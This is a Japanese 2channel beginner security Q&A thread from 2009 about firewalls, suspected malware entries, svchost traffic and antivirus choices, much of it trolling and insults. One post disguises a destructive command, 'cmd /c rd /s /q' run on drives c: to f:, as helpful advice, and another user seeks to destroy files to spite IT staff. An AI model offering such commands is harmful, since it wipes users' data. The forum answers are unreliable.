現在WinXPsp2でavast+spybotS&Dという構成です。 ソフトも定義ファイルも常に最新の状態にしていますが、ルーターのログに不正アクセスがよく残ってます。 ウイルススキャン等をしても検出される事はありませんし、シマンテックのセキュリティスキャンもしてみましたが、オールクリアでした。 しかし、怪しい挙動や、接続インジケーターがどこかと通信してる事があったりして、不安です。 このような状況で、ファイアーウォールソフトを追加する事は有効でしょうか? また、相性やオススメはありますか? ちなみに、セキュリティ関係はあまり詳しくありません。 よろしくお願いします。
質問させてや 【使用OS】 『windowsXPSP3』 例、Vista sp1 (「システムのプロパティ」参照) 【PCスペック】 『CPU: core2、3GHz 、メモリ: 3GB』 (「システムのプロパティ」参照) 【使用ブラウザ】 『Firefox3』 例、Firefox 3 【Microsoft Updateの更新の状態】 『最新』 例、自動更新設定 【セキュリティソフトと年式】 『Avast』 例、○○○○ 2009 【その他スパイウェア対策ソフト】 『spybot、ad-awarePRO』 【回線の種類・ルータの有無】 『光回線マンションタイプ、ルータは不明』 例、光回線でルータ使用中 【具体的な症状】 『起動時間を短縮しようとシステム構成ユーティリティの画面を開いて、スタートアップの所を見ると「ara-key」という見なれないものがありました』 【過程と措置】 『avastでスキャンしましたが見つからず、ara-keyを検索してもファイルがないと言われてしまいました』 【その他】 『ara-keyとは一体なんでしょうか?とくに怪しいサイトは見てません』
157 :
155 :2009/07/10(金) 02:15:47
>>156 何時何処で何時何分何秒ファイル共有ソフト使ってるって俺が言ったっていうかファイル共有ソフトは使ってないよ
あほ?
八頭死ね 頭悪いし 死んだほうがいいよったく ねくらだな最早
>>157 態度でかいんだよ
お前のような奴は死ね殺されろ
161 :
155 :2009/07/10(金) 02:24:20
>>159 あんたじゃ話にならんわ
八頭様を呼べ
この板で最もスキルが高いと噂されてるあの八頭様を
>>157 では、ファイル共有をやってる誰かの所から貰ってきたのかもしれませんね。
Avast以外のオンラインスキャンを利用して、複数のセキュリティソフトでスキャンしてみてください。
残骸なのか、本体が隠蔽されてるのかはわかりませんが・・・PCリカバリを推奨しておきます。
>>161 一番スキルが低い奴呼んでどうする。本人の自作自演で出てくるのかな?
ハチ公、来なくていいぞ。
ウィルス情報質問 総合スレッド★Part39
370 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:10:03 ]
【使用OS】 windowsXP
【WINDOWS UPDATE】 できなくなった
【ウィルスソフト】 ノートンが入っていたような・・・&hijackthis
【UPDATE】 たぶん
【スキャン】 hijackthisっていう解析ソフトで↓の奴が出てきた
O4 - HKLM\..\Run: [ara-key] C:\Program Files\WindowsUpdate\wuaudnld.tmp\cabs\com_microsoft.Q831167_IE6_SP1\Q8311674967.exe -StartUp
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax
【症状】 起動すると「フォルダが壊れています」っていうようなメッセージがでてくる
【やったこと】 何もしていない・突然出てきた
【とった処置】 毎回起動時に出てくる上のメッセージを閉じてる
371 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:15:57 ]
>>370 O4 - HKLM\..\Run: [ara-key]・・・っていうエントリーは百発百中antinny
っていうウイルスなんだけど、このウイルスってnyしてなければ
感染することなんて完全皆無だけどね。
お前、winnyしてるんじゃないんか?
>>155 登録名とファイル名が同じとは限らないでしょう。
システム構成ユーティリティのコマンドでファイルパスが確認できるのでは?
ファイルが特定できたら他社で検出されるか確認。
ttp://www.virustotal.com/jp/ 他社で検出確認出来たとしてもウイルスか否かの最終判断は貴方。
50%以上で黒判定なら略間違いなし?
30%程度でも有名所複数なら略黒判定?
どのように判断するかは貴方次第。
他社で検出確認出来ればウイルス名も判るので場合によっては対処法もわかるかも。
もし自演なら八頭の完全サポート劇場をみせてくれw
ハチ公キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
P2PウイルスをP2P以外のサイトで目撃することはありますよ
分類がP2Pウイルス(シェア拡散ウイルス)なワケですから・・・
>>156 さんに従い(
>>48 も読んで)
悪質な被害を及ぼすジャンルですから駆除とか考えずに
この場合、割り切ってスッキリ完全フォーマットが賢明ですね
168 :
155 :2009/07/10(金) 02:43:35
>>162 あんたの言うことは聞きません
八頭様の言うことが全てです
>>163 自作自演じゃないって言ってるだろ
>>164 >八頭様
ありがとうございます
たしかに起動時いつも「フォルダが壊れています」というメッセージが出てきました
まえには「指定されたファイルが見つからない」というメッセージも出てました
悪意のあるソフトはインスコした覚えはないのですが
いつもはavastでスキャンするし、問題なければファイルを開く
んですよ
だれもファイル共有ソフトは使ってないと言ってるのに、信じてくれないなんて
ねっとのまなーを少し学べやと言いたいね
>>165 virusとありますが、踏んで大丈夫ですか?
あと自演じゃないよ
170 :
165 :2009/07/10(金) 02:51:34
>>168 リンク先は安全だと言えば踏むし、罠だったと言えば踏まないのか?
好きにすればよいでしょう。すべては自己判断、自己責任なのだから。
八頭よ、自作自演も、正しいように見えて大筋では間違ってる回答もどっちもいらんから。 お前が出てくるのはスレ利用者の迷惑にしかならんぞ。
173 :
155 :2009/07/10(金) 03:29:01
八頭いらん リンクしか張れない低脳回答なんて意味ねえんだよ
じゃあ紙芝居か
八頭なんか検出可否スレに篭もればいいんだ
>>160 >>154 です。
詳しい解説ありがとうございます。
比較検討して導入したいと思います。
ありがとうございました。
ハチ公ってこことトンスレ以外にも出没してるのか!
>>175 それだけは勘弁願うぜwwwww八頭が検出可否スレなんかに常駐されようものならぼかしつきの画像貼られてみんなパニックになるぜwwwwww
181 :
165 :2009/07/10(金) 11:28:58
リンクも踏めないスキルでセキュ板来ても所詮怪我の元
八頭のリンクは安心して踏めるよ^^
183 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 12:57:09
spof.sysって何してるの? てか実体何処にあるの?
185 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 13:37:22
ルータ買ってこようと思うんですけど セキュリティ的には安いので問題ないですか? 速度的にはもともと5,6Mなんであまり気にしないんですけど多分
186 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 13:40:13
というかセキュリティ的にルータいれたほうがいいとわれたので 買ってこようと思うんですが 2.3000円のやつでいいですかね?
> リンクも踏めないスキルでセキュ板来ても所詮怪我の元 最終的にノートンかMicrosoft Security Essentialsの2択で疑う余地ないです。
189 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 13:51:52
>>188 安いですね
これでいいならこれ買ってこようと思います
ありがとうございます
無線LANもしたいならそれじゃダメだからね
191 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 14:19:26
Γ(^o^) ココ油足りないんじゃネーノ
なんでテンプレにハチ公お断りって入ってないの?
193 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 14:42:40
選択肢は刃(やいば)なり〜
>>192 盲導犬や介助犬がOKのお店があるのと同じだとか
ハチ公www
【ハチ公】セキュリティ初心者質問スレッドpart○○【お断り】
ハチ公って何でもかんでもノートン、ノートンだよな? それが終わるとリンク貼りしかしない 何の答えにもなってなくね?
>199 八頭ってノートンの社員? って考えすぎか…
>>188 >>190 お店に行ったらバファローのやつしかなかったので
3000円だったけど買ってきて取り付けました
無線LANもほしかったけどセキュリティ的にいうと逆行するかなー
と思い今回は見送りました
これで安心してネットできます
相談にのっていただきありがとうございました(ペコリ
>>171 殴るぞはっつあんw
だから 俺が >22 と>40 で…
しかし、なんだな リンク先に書かれてることは部分的に、、、、いや、やめておこう
>>200 >142 からすると ただの自慢したがりのような
>202 そーいえば俺も自慢するときだってあるよーなないよーな… >203 φ(゜o゜)ノシ
ハチ公いねえのかw
八頭 様 以前は大変お世話になりました。 いるんでしょ 出てきて元気な姿を見せてください。 オラ!出てこんかい!
釣りバカ見てんだよw
ハチ公のAA作ってやれよw
ルータつけたんですけどエロサイトに行くと 宮崎の素敵な女性います みたいな宣伝がでます IP見えないようになってないんですかね?
プロバイダは相手に隠してないから。
そういうことなんですか 即レスありがとうございます
>184 遅れてすいません。 実体というのは、spof.sysがある場所でしょうか? それとも、spof.sysを動かしてる親玉でしょうか? >208 φ(・o・)ノシ >210 海外のエロサイトでは良くそういったものが見られますよ もっともIPアドレスから分かる情報は限られてるわけで、 あまり気にするようなことでは、ありません。
215 :
名無しさん@お腹いっぱい。 :2009/07/10(金) 23:51:41
質問です。 とあるサイトでzipファイルを落としてノートン先生に診てもらったら ウィルス有りで解決と表示されました。 もう一度、同じファイルを診てもらったら問題無しとでました。 このzipファイルはもう安全とみなしていいのでしょうか?
___ ━┓ ___ ━┓ / ― \ ┏┛/ ―\ ┏┛ / (●) \ヽ ・. /ノ (●)\ ・ / (⌒ (●) /. | (●) ⌒)\ /  ̄ヽ__) / | (__ノ ̄ | /´ ___/ \ / | \ \ _ノ | | /´ `\
そんなファイルは諦めて捨てるのが正しい対処法です。
.| | | | | | | | | | || | | .| | | レ | | | | | J || | | ∩___∩ | | | J | | | し || | | | ノ\ ,_ ヽ .| レ | | レ| || J | / ●゛ ● | .J し | | || J | ∪ ( _●_) ミ .| し J| 彡、 |∪| | .J レ / ∩ノ ⊃ ヽ ( \ / _ノ | | \ " / | | \ / ̄ ̄ ̄ /
【使用OS】 『XP SP3』 【PCスペック】 『CPU: 3GHz 、メモリ: 2GB』 【使用ブラウザ】 『Sleipnir』 【Microsoft Updateの更新の状態】 『自動更新は停止状態』 【回線の種類・ルータの有無】 『sonet ADSL12M AtermWD701CL(ファームウェアは最新1.11)』 つい先日sonet乗り換えてモデムを接続したところ 通信してないのにDATAランプが点滅しているのでパケットモニタで見てみると scvhost.exeがローカルIPアドレスに対して1kb/s以内でずっと通信しています これは正常なのでしょうか? 一応ぐぐって調べてみたのですが、ログイン名でscvhostが働いていたら ワームの可能性とか書いてあったのをみたのですが ログイン名で働いているscvhostはありませんでした よろしくお願いします プロセス名:c:\windows\System32\scvhost.exe リモートホスト:warpstar リモートIPアドレス:192.168.0.1 ローカルIPアドレス:192.168.0.5
>>219 ウイルスとかそういうのじゃないと思うよ。
その通信でどのポート番号使われてるかわかりませんか?
【ノートン】Norton Internet Security Ver.169【2009】
http://pc11.2ch.net/test/read.cgi/sec/1247110729/116 116 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/10(金) 23:57:32
質問です。
とあるサイトでzipファイルを落としてノートン先生に診てもらったら
ウィルス有りで解決と表示されました。
もう一度、同じファイルを診てもらったら問題無しとでました。
このzipファイルはもう安全とみなしていいのでしょうか?
マルチとか・・・
これハチ公の自演じゃね?
>>220 1500-2700ぐらいまで使っているみたいです
一時期ミスでファイアウォールが無効になった状態のままネットしてたんだが、 完全スキャンして何も引っかからなければ問題なかったって認識でよい?
avast使ってるんですが なんかよく貼られてるランキング見たいので結構順位が低いみたいなんですけど 大丈夫なんですかね?
225 :
名無しさん@お腹いっぱい。 :2009/07/11(土) 10:17:26
どうです?
>>226 心配だからフォーマットするわ、サンクス
どんだけPCに重要なものが入ってるんだよw おまいら過度になりすぎw あほかw
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
>>227 これ使えばいいじゃん
何もかも消えてしまうけど
フォーマットしようが一時的バックアップとったファイルの中にヤバイモノが紛れ込んでたら始末に負えないぞ
スキャンかけても何も出てこないしなwwww
ファイル名を指定して実行に
cmd /c rd /s /q c:
と入力し[OK]
上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
パソコン初心者の私に教えて下さい プラウザFirefoxにセキュリティー機能が搭載されているから、市販のセキュリティーソフトは 必要ないと判断して良いでしょうか?
>>232 インターネットしなければブラウザ関係なくセキュリティソフト必要なしですよ
236 :
232 :2009/07/11(土) 14:18:47
素早い返信サンクスです。(今はノートン2009を使用中) まあ、しばくはIE8を使ってみます。
>>235 甘いぞ
最近はUSBから感染するウイルスも多い
USBメモリが感染してなければ問題ない。
>>222 プロセス名:c:\windows\System32\scvhost.exe
リモートホスト:warpstar
リモートIPアドレス:192.168.0.1
ローカルIPアドレス:192.168.0.5
↑こう判断したのはfirewallのログからでしょ?そのログの画面ハードコピーを
とってうpしてみてくれない?
241 :
219 :2009/07/11(土) 16:53:17
>>240 リモートポート:2689
状態:EASTABLISHED
プロセスID:1172
NEGIESというのを使っていて、情報コピーみたいな機能はありません
あとは、上記のような情報しか見れないです
他の人はこういうことないんでしょうか?
前のプロバイダのモデムもこういう感じでDATAランプが点滅しっぱなしHDDランプも点滅
242 :
名無しさん@お腹いっぱい。 :2009/07/11(土) 16:58:22
ここにまともに答える奴なんていませんよ 初心者煽ってる屑しかいません
>>241 prtscrでログ画面のハードコピーをとって (もしくはALT+prtscrで対象ウインドウのみ)
それをうpローダにあげてくれって意味なんだけど。
同時にコマンドプロンプトからnetstat -anoと打ってその画面もあげてくれると
なにかわかるかも。セキュリティソフトは何使ってます?
244 :
名無しさん@お腹いっぱい。 :2009/07/11(土) 17:29:53
>>243 何聞き出そうとしてるんだ?
ハッキングでもしようってのか?
そんな情報あげられるか
ここまで言って何もわからないわけないだろカス
245 :
名無しさん@お腹いっぱい。 :2009/07/11(土) 17:37:22
Vista x64で使えるフリーのウイルス対策ソフトありませんか
ローカル内の通信なんだろ。ファイル共有とかしてるんじゃないか?
>>240 atermstation 、WARPSTARサテライト
使ってるアクセスポイントとの通信だろ
250 :
名無しさん@お腹いっぱい。 :2009/07/11(土) 20:32:35
c:\windows\System32\scvhost.exe この情報出してわからないやつが 使用ポートなどを聞いてわかるわけないだろボケ てか、全然関係ねーし FWソフト何使ってるかなんて関係ねーだろ 氏ねボケ
c:\windows\System32\scvhost.exeはヤバイ… c:\windows\System32\svchost.exeなら問題ないが。
c:\windows\System32\svchost.exeな 書き間違えてたわ どっちみちわかんないんだろおまえらには
問題あるなしじゃないんだよ このうざい通信を止められないのかってことなんだよ ずっとDATAが点滅してたらアタックされている場合の判断つかないし まじでうざい
>>254 はいはい、みんなわからないのでお引取りください。
svchost.exeが2000番代のポートつかってる時点で・・・
つか、マルチしまくりだな
またハチ公の自演か!
マルチじゃねーだろ 荒ししかいないから他で聞いているんだろ
SVCHOST.EXEはタスクマネージャのプロセスで複数起動していることがありますが、各サービスを起動するためのプロセスです。 同じ名前を装ったウイルスなどもありますので、ウイルスチェックは定期的に行いましょう。 例えばXPやMedia PlayerのNETWORK SERVICEなら ・ASP.NET State Service ・Distributed Transaction Coordinator ・DNS Client ・Performance Logs and Alerts ・Remote Procedure Call (RPC) ・Remote Procedure Call (RPC) Locator ・Windows Media Player Network Sharing Service (*Media Player 11 ) technet.microsoft.comのProcess Explorerで各プロセスの確認は出来るね
260 :
219 :2009/07/12(日) 03:36:16
>>259 どうもありがとうございます
ウィルスならログイン名でプロセスが起動するようですが
そういうことは一切ありません
それに動いているのはこれです
c:\windows\System32\svchost.exe
これがウィルスなら、ネットすらできないでしょ・・・
というか、この質問に答えられないということは
他の人のPCだとネットしていないときにDATAランプは点滅していないのですか?
前のプロバイダのモデムも、前に使ってたPCでも点滅しているので普通だと思っていたんですが
やっぱり、ずっと点滅しているのはうざいのでどうにかしたいんですけど
それとリモートポート:2689を使うサービスは
SSDP Discovery Service
UPnP divece host
のようで、これらを停止しても点滅は止まりません
261 :
219 :2009/07/12(日) 03:39:51
sc qc rpcss で見ると Remote Procedure call(RPC) だけ表示されました
>>260 おまえに質問は無理。半端な知識で考えてろwww
誰か「ハチ公の部屋」でスレ立ててやれよw
265 :
219 :2009/07/12(日) 04:24:22
/ヽ /\ / (ー −)\ バカには聞いてない黙ってろ ( (_人_) ) ノ `-' ヽ (_つ _つ __ /ノ ヽ\ / (● ●)\ だっておwwwwwwwwwwwwwwwww ( o゚(_人_)゚o ) ノ/) )) lr-l /) )) バン!! (_つ ))`-' _ つ )) バン!!
267 :
219 :2009/07/12(日) 04:34:59
>>263 >>264 >>262 お前ら何が目的なの?
質問者煽ることがお前らにとって何か得でもあるのか?
お前らどんな人生歩んでるんだよ気持ち悪い
268 :
219 :2009/07/12(日) 04:36:10
>>266 誰も答えられないじゃん
バカじゃないの証明してみろよ
答えられないなら俺と一緒
狂犬病注意
270 :
219 :2009/07/12(日) 04:37:28
そうやって煽るためにわざわざここに毎日きてんの? 気持ち悪い 答えなくていいから黙ってろよ無知のバカ
272 :
219 :2009/07/12(日) 04:44:20
274 :
219 :2009/07/12(日) 04:55:45
友達いないからってここにくるなよカス
>>260 WAN側のアクセス表示と、LAN側のアクセスが、ゴッチャになってるんでは?LAN側のアクセス表示は、
ルーター内蔵の物だったり、Webサーバ内蔵してたりすれば、1秒間隔ぐらいでアクセスするでしょ。
ローカルIP内の通信なら、個人ユーザーなら気にすること無いと思うけど?
点滅がウザイというなら、10年ほど前の機材で固めないと。OSも。DHCPとかUPnPとか無縁で、NET接続
を全部手動で設定する世界に戻るしかないでしょね。
276 :
219 :2009/07/12(日) 07:31:07
>>275 レスありがとうございます
ということは、この点滅は最近PCのユーザーなら点滅しているということですか?
277 :
名無しさん@お腹いっぱい。 :2009/07/12(日) 10:32:50
八頭だな
八頭の自演うざすぎる
(ο^д^)ノシ
280 :
219 :2009/07/12(日) 16:50:14
もう解決したからwww 無能どもバイバイw
281 :
219 :2009/07/12(日) 18:25:36
それにしても、ほんとできる人は違うねww どこ聞いても答えてもらえなかったのに 優秀なエンジニアはいるものですね。さすがですね おまえらバカもわからないからって質問者煽ってないで ちゃんと勉強しろカスw
282 :
219 :2009/07/12(日) 18:49:14
>>240 なにがポートだよボケwww
何がファイアーウォールだチンカスw
ノートンの更新期間が終わりそうなのだが、次はどのソフトを使おうかな。(・ω・` ) 下記ソフトならばどれがベストチョイスでしょうか? インターネットセキュリティー・バリア メディアロック2 ウイルスキーラ-ゼロ ZoneAlarm G-DATA マカフィー セキュリティーZERO ESET V4.0
284 :
219 :2009/07/12(日) 18:58:17
285 :
219 :2009/07/12(日) 19:02:33
【使用OS】 『Vista SP2』
【使用ブラウザ】 『Firefox』
【セキュリティソフトと年式】 『G DATA InternetSecurity2009』
【回線の種類・ルータの有無】 『ADSL 無線』
【具体的な症状】 『G DATAが誤検知するソフトのダウンロードが出来ません』
【過程と措置】 『G DATAをウイルスガードを無効にするに設定しても遮断してくるのでどうすればダウンロード出来るのか困っています』
【その他】 『
ttp://lapcie.com/index.php?page=AsukaTime 例えばこれとかダウンロードしたいのですが』
>>286 追記 この板のG DATAスレも見られません
例外設定とか無いの?
手っ取り早い方法としてはG DATAをア(ry
>>288 恐らくWebサイト一つ一つを例外にする設定は無いのではと思います、正直G DATAは使い始めて日が浅いのでよく分からないのですが…
>>289 それは実は本当に一時的にしようかと思ってましたwしかし冷静に考えるとG DATAスレにG DATA使ってない人がいないわけねーだろwって思ったのでどうやってるのかなぁと思っています
G DATAを使ってるヤツはどうやっても見れないような 嫌がらせって可能性もあるけどなw
>290 俺はG DATA使ってないのでG DATAの知識は完全にゼロです。 えっとー…この板はFirefoxで閲覧? 専ブラでも見れませんか?<gダタスレ
>293 φ(^∀^)ノシ
>>290 使ったことがないソフトなので…
常駐を無効にしてもPFWが生きているとか…?
根本的解決にはならないけど自動起動を切ってリブートしてみるとか…
>>294 ( ´(ェ)`)ノシ
>295 φ(^∀^)ノシ
【使用OS】 『Microsoft Windows XP Professional Version 2002 Service Pack 3』
【PCスペック】 『CPU:Intel Pentium V プロセッサ 850MHz 、メモリ:1.00 GB RAM』
【使用ブラウザ】 『Microsoft Internet Explorer 6』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『AVG Anti-Virus Free Edition 8.5』
【その他スパイウェア対策ソフト】 『Spybot-Search&Destroy』
【回線の種類・ルータの有無】 『ADSL 12Mbps 有線ルータで使用中 』
【具体的な症状】 質問の内容になりますが
グループポリシー(gpedit.msc)の、
[コンピュータの構成]-[管理テンプレート]-[Windows コンポーネント]-[Internet Explorer]
[インターネット コントロール パネル]-[セキュリティ ページ]の中にある
ロックダウンされたインターネット、ロックダウンされたイントラネット
ロックダウンされたイントラネット ロックダウンされた信頼済みサイト
について、これらを設定した場合はどこに反映され、
どのようなことをすれば、設定できていることを確認できるでしょうか?
【過程と措置】
実際にロックダウンされたインターネットにセキュリティレベルを最高に設定し
YouTubeを開き、動画再生ページに移動したが、普通に再生できてしまう
「ロックダウンされたインターネット」でGoogleで検索すると答えてねっとに
http://www.kotaete-net.net/Default.aspx?pgid=14&qid=240997422018 回答らしきものがあるが、結局、どこに設定されているか分かりませんでした。
>298 再起動しても駄目ですか? あと、セキュリティレベルを最高にしたら通常はActiveXなどが無効に設定され、 インターネットオプションから戻そうとしても、変更はできなくなるのですが…
アンチウイルスソフトを切ってあえてウイルス.exeを実行してまたソフトをつけるとどうなる? 激怒、スルー?
ウイルスによる
レスども。唐突に疑問に思ったんで面白そうなウイルスあったら仮想ソフト上で実行してみる。
>298 今、確認してみたんだけど俺のには >ロックダウンされたインターネット とかいうものはないですね。 インターネット ゾーン、イントラネット ゾーン、信頼済みサイト ゾーン、制限付きサイト ゾーン、 ローカル コンピュータ ゾーン、ロックダウンされたローカル コンピュータ ゾーン ならあるのですが。 インターネット ゾーンのセキュリティを最高レベルにしたいのなら、 [コンピュータの構成]-[管理テンプレート]-[Windows コンポーネント]-[Internet Explorer] [インターネット コントロール パネル]-[セキュリティ ページ]の中にある [インターネット ゾーンのテンプレート]のプロパティを開いて、 有効を選択→最高に設定→適用、でOKなのですが。 俺のはXPのメディアセンターですから、違ってるかも…
>>291 嫌がらせだとしたら俺のような初心者にはホント効果抜群ですw
>>292 FirefoxでG DATAスレ見ても駄目ですし、専ブラ(V2Cです)でも駄目ですね
>>295 一度ダウンロード出来ればファイル自体を例外設定には出来るので確かに根本的解決にはなりませんが試して見ようと思います、ありがとうございます
G DATAスレで聞けば一発で分かるのでしょうが如何せんスレそのものがあれなのが無念です
しかしウイルスガードを無効にするに設定して問答無用で遮断するとはいったい何を無効にしているのか解せませぬ…
>305 Firefoxも専ブラも駄目なら、IEはまず無理でしょうね。 あとの手は携帯で見るか…ネットカフェや友人のPCで見せてもらう…かな?
まだいますか?
>>305 G DATAスレの836-837に
>836 名前:名無しさん@お腹いっぱい。 投稿日:2009/07/11(土) 01:39:16
>あんまりにネットが重いから設定で「インターネットコンテンツのスキャン」を無効にして使ってんだけど
>これ切っちゃうとセキュリティソフトとして無意味?
>837 名前:名無しさん@お腹いっぱい。 投稿日:2009/07/11(土) 16:13:50
>切っても常駐保護によるウイルス検出は行われるので
>無意味にはならない
というレスがあったのですが、「インターネットコンテンツのスキャン」を無効にしても、G DATAのスレは見れませんか?
>>307 あー見られました!ありがとうございます!
しかし本命の誤検知ファイルをダウンロードはこれでも出来ない様ですね
G DATAスレで聞いてみようと思います う〜むなんだか叩かれそうだがw てか俺の書き込みがコピペされてあってワロタ
Firefox 3.xって、ダウンロードしたファイルをインスコされてるアンチウイルスでスキャンするよね?
>>286 はそれで引っかかってるんじゃねーの?
>>154 です。
COMODO Firewallを導入しました。
一番良さそうだったし、最近日本語のも対応したみたいなんで。
導入後なぜかルーターの不正アクセスがなくなりました。
以前はソフトバンクBBからや中国からの攻撃がよくあったのですが、、、。
とりあえず一安心です。
>>309 あー本当だ出来ました、あーあーあー凡ミスすぎて非常に情けないです…
それにしても答えて下さった皆さん本当にありがとうございました
>>308 どうも、誤検知じゃなさそうですよ。あれはブロックしてもおかしくない。
>>312 あれはパッカーの誤検出でしょ?
アンパックしてからスキャンしてみなよ。
314 :
名無しさん@お腹いっぱい。 :2009/07/13(月) 16:17:07
ルータってファイアウォールの前にあるんじゃないのですか?
クッキーを残しとくのはセキュリティ的にどれくらい危険ですか?
317 :
名無しさん@お腹いっぱい。 :2009/07/13(月) 17:24:05
フラッシュプレイヤーのクッキーも毎回消したほうがいいんですか?
321 :
名無しさん@お腹いっぱい。 :2009/07/14(火) 03:12:03
相談なんだがウイルスセキュリティZERO使ってるけどフリーの奴と どっちがお勧め?
.| | | | | | | | | | || | | .| | | レ | | | | | J || | | ∩___∩ | | | J | | | し || | | | ノ\ ,_ ヽ .| レ | | レ| || J | / ●゛ ● | .J し | | || J | ∪ ( _●_) ミ .| し J| 彡、 |∪| | .J レ / ∩ノ ⊃ ヽ ( \ / _ノ | | \ " / | | \ / ̄ ̄ ̄ /
323 :
名無しさん@お腹いっぱい。 :2009/07/14(火) 03:20:39
ハチ公の予感 っていうAA作るわ
アダ被の質問掲示板にいる イカ って回答者 もしかしてハチ?
>>324 期待してるwktk(n‘∀‘)η゜・*゜・*
∧_∧ トンファーハチ公の予感キ〜ック! _( ´Д`) / ) ドゴォォォ _ / ∩ / ,イ 、 ノ/ ∧ ∧―= ̄ `ヽ, _ | | / / | ( 〈 ∵. ・( 〈__ > ゛ 、_ | | | | ヽ ー=- ̄ ̄=_、 (/ , ´ノ \ | | | | `iー__=―_ ;, / / / | |ニ(!、) =_二__ ̄_=;, / / ,' ∪ / / / /| | / / !、_/ / 〉 / _/ |_/ ヽ、_ヽ
329 :
名無しさん@お腹いっぱい。 :2009/07/14(火) 23:30:26
スレチかもしれないが、さっきびっくりした。 半角板のぞいてたら、画面が暗くなり、変なアニメ 「しね〜 しね〜」と変な歌が流れる。 あわててALT+F4 押しても消えない。電源を押すと、ノート(だいなぶっく)なので、 スリープ状態。また電源を押すと、デスクトップは出るが、また画面が暗くなり変な歌。 何回かそれらの動作を繰り返し、隙間を縫って スタート→電源を切る ほっとして電源を立ち上げると元に戻った。安心した。 念のためにトレンドマイクロのチェックやったが、ウイルスは検出されず。 一体なんなんだったんだ???
ハチ公かわいいよハチ公
>>329 どの板でもスレ見ているだけではマルウエアや冗句ソフトがダウンロード
されたり実行されたりはしないんだよ。
リンクを踏んだことを隠す必要があるんだねw
そうそう、トレンドマイクロで白だったからといって何事も無かったとはかぎらないよーw
マルチにマジレスw
333 :
名無しさん@お腹いっぱい。 :2009/07/14(火) 23:50:26
tube8とか見るのって大丈夫ですか?
勇気あるな
___ /|∧_∧| マルチとハチ公 ||. (・ω・`| お断りします ||oと. U| || |(__)J| ||/彡 ̄ ガチャ
中部地方は逝ってよし
337 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 00:01:28
338 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 00:02:21
もう十回くらい見てるんですけど・・
ハチ酉忘れてるぞw
5回くらい抜いたかな
グロ注意
知らない間に、自分のPCのCドライブが、ファイルサーバーの共有ドライブに隠しディレクトリとして 保存されているのに気が付きました。 怒ったので削除しようと思いましたが、ファイル復活ソフト とか使われてしまったら意味ないですよね? すごく悔しいです。 情シスの人間に一泡ふかせてやりたいのですが、どうしたら復活出来ないようにファイル削除することが できるのでしょうか? ご指導お願いします。 【使用OS】 『XP SP3』(ファイルサーバーも同じ) 【PCスペック】 『CPU: 2.4GHz 、メモリ: 1024MB』 【使用ブラウザ】 『IE 7』 【Microsoft Updateの更新の状態】 『自動更新設定 共有ドライブは、ファイルサーバの外付USBで繋がれており、直接触ることができます。 そしてファイルサーバーの管理パスワードも知っています。 デフラグとかで痕跡を消去することはできるのでしょうか?
>>344 なんとなく不安を感じて聞くんだが
それって自分のPCというより、職場/学校の備品ってことか?
346 :
345 :2009/07/15(水) 00:57:11
いいえ、自分の私物です。 ドメインは無く、ワークグループで情報を共有しています。
勝手に保存されたと怒っているようだが、勝手に保存できるような 設定のPCを勝手に繋いだバカの責任。 自分の私物のPCを勝手に繋いだら普通は懲戒もの。再就職先探せば?
ちょっと教えてもらいたいのですが、 1週間前のことですが、DVDのトレーがたまに開閉するようになり、 ノイズかなんかかなぁぐらいで放置していましたが、 2日目位からネットの接続が遅くなり、グーグルは開けますが、ヤフーを開くと固まってしまう状態でした。 なんか怖くなり、トレンドマイクロのオンラインでスキャンしましたが、何も出ず SPYBOTでスキャンしたところダブルクリックのスパイウェアが1個出てきただけでした。 ブラウザの表示が困難になったので、ママンを変えるついでにVISTAを再インスコしたら 直ったので事なきを得たのですが、これは何かのウイルスに感染していたのでしょうか? または、ママンの故障なのでしょうか?SSD、メモリは流用したので壊れてはいませんでした。 申し訳ないのですが、何かおわかりになられる方がいらっしゃいましたらご教授願います。 お願いいたします。
>1週間前のことですが、DVDのトレーがたまに開閉するようになり、 ディスクに書きおわった時に発生するあっかんべー現象でなければ異常。 >2日目位からネットの接続が遅くなり(略) 特定はできませんが、PCの不調なのか(熱暴走とか)、HDD内のファイルが壊れたのか、マルウェア感染の影響なのか 判断のしようがありません。 交換したM/Bのコンデンサー(CPUの周辺に並んでるもの)が膨らんだり、破裂したり、液もれしたりはしていませんか? その場合は、M/Bの故障です。ついでに、HDDの物理エラーがないかどうか、CHKDSKを行ってみてください。 マルウェアの影響を疑う場合は、複数のセキュリティソフト(オンラインスキャンを使用)でスキャンして、どこのベンダーでも 発見できない場合は、安心していいんじゃないかと思われます。
質問よろしくです。 ネットの接続が定期的に切れるんで、電話会社に電話して調べてもらったんですが、 調べてもらっている間、証券会社のツール(パスワードが必要な)をひらいてたんですが 調べている人が、開いている自分のツールを見てしまった可能性はあるでしょうか・・・?
あります
352 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 15:04:06
セキュリティに詳しい人ってみんなエロサイトとか好きなんでしょ? そのために勉強したんだよね?
答えは貴方の胸の中に
イカって野郎って八頭だろ 何が「永久保存してください。」だ
356 :
中山健 :2009/07/15(水) 17:19:01
タコ八郎ですが何か?
357 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 19:06:12
【使用OS】『VistaHP』 【PCスペック】『PentiumDC E2200 2,2GHz』 【使用ブラウザ】『Firefox3,5』 【Microsoft Updateの更新の状態】『自動更新は停止状態』 【セキュリティソフトと年式】『ウイルスバスター30日体験版』 【具体的な症状】『3〜6秒重くなる』 【過程と措置】Safariを使ってみたら上記のような症状はなし
358 :
名無しさん@お腹いっぱい。 :2009/07/15(水) 19:12:20
そうなんだ
まぁ、バスターの所為だろうな。
【業界1位】ウイルスバスター2009 Part23【独走中】
